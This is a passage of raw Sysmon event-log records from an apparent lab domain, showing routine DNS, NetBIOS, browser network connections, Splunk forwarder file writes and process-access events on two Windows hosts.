AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-137netbios-nsfalse10.0.1.14win-dc-429.attackrange.local137netbios-ns 354300x80000000000000001051242Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:48.692{5EBD8912-7F11-614D-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-429.attackrange.local137netbios-nsfalse10.0.1.255-137netbios-ns 354300x80000000000000001051241Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:48.692{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse127.0.0.1-51925-false127.0.0.1-53domain 354300x80000000000000001051240Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:48.692{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51925- 354300x80000000000000001051239Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:48.692{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue7f00:1:0:0:98d0:6307:84e0:ffff-51925-true7f00:1:0:0:0:0:0:0-53domain 354300x80000000000000001051238Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:48.692{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local51925- 23542300x8000000000000000979863Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:51.552{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=353211506DCAFA4822599433AD5893C5,SHA256=310C57929D03B393517438D361881EAB7DC8680D5F90186936AB0D0D5596792F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051272Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:51.907{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\permissions.sqlite-journalMD5=CFB3B942ABBBF176BC95BB1AEA11EEB2,SHA256=D600A0F7E185A99DBA1D361C32F363BE8218D8F826CDA6440BC3C348FA4C0617,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051271Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:50.047{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49799- 354300x80000000000000001051270Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:50.040{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-429.attackrange.local57523-false142.250.186.66fra24s05-in-f2.1e100.net443https 354300x80000000000000001051269Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:50.039{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local58286- 354300x80000000000000001051268Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:50.037{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local57522- 354300x80000000000000001051267Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:50.037{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local57902- 354300x80000000000000001051266Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:49.989{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-429.attackrange.local57202-false142.250.185.98fra16s49-in-f2.1e100.net443https 354300x80000000000000001051265Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:49.989{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local55275- 354300x80000000000000001051264Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:49.986{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local57201- 22542200x80000000000000001051263Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:50.114{5EBD8912-7B3A-6151-3A78-00000000FC01}7120plus.l.google.com0142.250.186.46;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001051262Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:50.113{5EBD8912-7B3A-6151-3A78-00000000FC01}7120apis.google.com0type: 5 plus.l.google.com;::ffff:142.250.186.46;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001051261Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:49.207{5EBD8912-7B3A-6151-3A78-00000000FC01}7120gstaticadssl.l.google.com02a00:1450:4001:803::2003;C:\Program Files\Mozilla Firefox\firefox.exe 354300x80000000000000001051260Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:49.805{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-429.attackrange.local64466-false142.250.186.46fra24s04-in-f14.1e100.net443https 354300x80000000000000001051259Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:49.805{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local56724- 354300x80000000000000001051258Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:49.804{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local52726- 354300x80000000000000001051257Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:49.725{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-429.attackrange.local58848-false142.250.181.227fra16s56-in-f3.1e100.net443https 23542300x80000000000000001051256Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:51.017{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=615529EE649B29AAC7A49EA084136356,SHA256=5727680903EF3A499A37115B28C6A7FCDBD8A1A6109058E43EEB1AA410649B1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979862Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:51.443{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=07A203EB4FC48137F0E6AC984A302BE1,SHA256=A0E9F378FB30640BC5B063AED981F70A6A032E181070C03E3ABE76AA7D8D2A1F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979861Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:48.764{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59755-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979860Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:48.475{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-57695-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979864Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:52.568{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B1CC3BDBC3811F9D887C0C1594CA34F,SHA256=3B4712AE613DF3944169309EA837BB121B1A1A22A503893764ED86301D6FF0B7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051275Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:50.218{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54781- 22542200x80000000000000001051274Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:50.356{5EBD8912-7B3A-6151-3A78-00000000FC01}7120adservice.google.de0type: 5 pagead46.l.doubleclick.net;::ffff:172.217.18.98;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001051273Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:52.030{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=947FDDA5369B85F08587E3261067A36F,SHA256=7A4B2419EEA4735D38098FA868B05663F51EDC13D08832FDF0B214DE645091E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979865Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:53.583{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4BA665AA7974AD8D18E7D5613DC8990,SHA256=B7DB43286B173BE8571ED6C760586AAD3C3096AC05A35003DB25AB3DC25E451F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051278Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:51.326{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local52026- 22542200x80000000000000001051277Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:51.296{5EBD8912-7B3A-6151-3A78-00000000FC01}7120hkcu.9002-C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001051276Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.061{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=984D15934A00976E83CDAB43EA1FB874,SHA256=1A50CF605C8B63C20F20861E9126E178A0115C0B108DD1C5E0E3282CCC152BCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979867Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:54.583{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AE70C368D5E042B905F5B517FEFC15B,SHA256=4E66DEEBD9DF663DE2C351F8DD8A135D441CC37E32AC74BCBC50CAB11B7B157E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051334Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.892{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051333Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.872{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051332Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.871{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051331Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.870{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051330Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.869{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051329Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.869{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051328Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.869{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051327Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.788{5EBD8912-8C06-6151-5A7A-00000000FC01}49727100C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051326Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.715{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7CB233A7FE78B683256B025B993755FE,SHA256=1FF4D140C8F7C1B194F2420560DD17E7F1C0F77C05625B28FF6F565079372C63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051325Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.714{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F760E884CF6AE74F919795464FEBA28A,SHA256=BD660506C844C0BF20D088276C042A44F5B67CB361B48259B1C77C9EDC949CBD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051324Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.596{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8C06-6151-5A7A-00000000FC01}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051323Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.594{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8C06-6151-5A7A-00000000FC01}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051322Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.592{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8C06-6151-5A7A-00000000FC01}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051321Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.593{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051320Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.593{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051319Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.593{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051318Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 